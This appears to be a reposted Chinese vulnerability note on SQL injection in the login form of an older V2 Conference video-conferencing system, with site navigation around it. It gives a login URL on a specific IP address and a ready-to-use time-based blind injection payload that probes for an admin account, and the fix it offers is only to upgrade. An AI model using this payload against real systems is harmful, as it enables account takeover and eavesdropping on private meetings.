正在阅读:绿盟视频会议系统SQL注入绿盟视频会议系统SQL注入

2017-03-14 14:13 出处:其他 作者:佚名 责任编辑:lixianmei

  通过注入能够拿到管理账户密码,然后登录后台查看会议密码,通过会议密码能够进入到远程会议中,恶意攻击者能够窃取某些敏感信息。

  http://211.151.49.196:18080/V2Conf/jsp/user/loginAction.do

  其实是V2 Conference视频会议系统较低版本的SQL注入,注入发生在登录时用户名的输入框内,使用以下注入语句可测试:

  1' or (select benchmark(300000,md5(user())) from users where substring(username,1,5)='admin')#

  修复方案:

  升级补丁
金视通视频会议系统
立即下载

相关文章

PPT内容制作基础教学分享【详解】 逍遥模拟器怎么多开 逍遥模拟器多开的教程【详解】 逍遥模拟器怎么安装软件 逍遥模拟器安装软件的教程【详解】 如何在PPT中插入视频 在PPT中插入视频的方法【详解】 Safari浏览器打不开该网页怎么办 【详解】 华为电脑管家无法登录怎么办 华为电脑管家登录不了的解决方法【详解】 Win7安装Office2010提示需要MSXML 6.10.1129.0组件怎么办 【详解】 华为电脑管家怎么清理垃圾 华为电脑管家清理垃圾的方法【详解】 Office365企业版和家庭版有什么区别 【详解】 PPT软件中如何自己制作灯泡图标的方法教学【详解】
聚超值·精选

关注我们

聚超值

热门软件

PC软件 安卓应用 iOS应用 手游电脑版
游戏专区
王者荣耀专区 绝地求生专区 炉石传说专区
IT百科 热门专题

汽车资讯

  • 正在加载中...

成都车展 宏光MINI EV 普拉多 欧拉黑猫 途达 起亚嘉华 玛奇朵 皇冠陆放 奔驰C级 哈弗神兽 坦克600 奥迪Q5 思域 卡罗拉双擎E+ 轩逸 太平洋汽车网app 新能源车

最新资讯离线随时看 聊天吐槽赢奖品